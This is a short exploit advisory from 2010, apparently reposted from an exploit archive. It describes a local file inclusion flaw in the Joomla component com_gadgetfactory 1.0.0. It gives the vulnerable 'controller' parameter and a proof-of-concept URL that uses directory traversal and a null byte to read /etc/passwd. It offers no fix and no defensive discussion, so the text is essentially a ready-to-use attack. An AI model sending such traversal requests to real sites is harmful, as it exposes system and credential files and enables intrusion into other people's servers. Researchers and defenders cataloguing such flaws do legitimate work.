Home / os / win7

Joomla Component com_gadgetfactory Local File Inclusion Vuln

Posted on 18 April 2010

=====================================================================
Joomla Component com_gadgetfactory Local File Inclusion Vulnerability
=====================================================================

===================================================================================================================
 
 
  [o] Joomla Component Gadget Factory Local File Inclusion Vulnerability
  
       Software : com_gadgetfactory version 1.0.0
       Vendor   : http://www.thefactory.ro/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
===================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_gadgetfactory&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00
 
 
===================================================================================================================


# Inj3ct0r.com [2010-04-18]

 

TOP

Malware :

Exploits :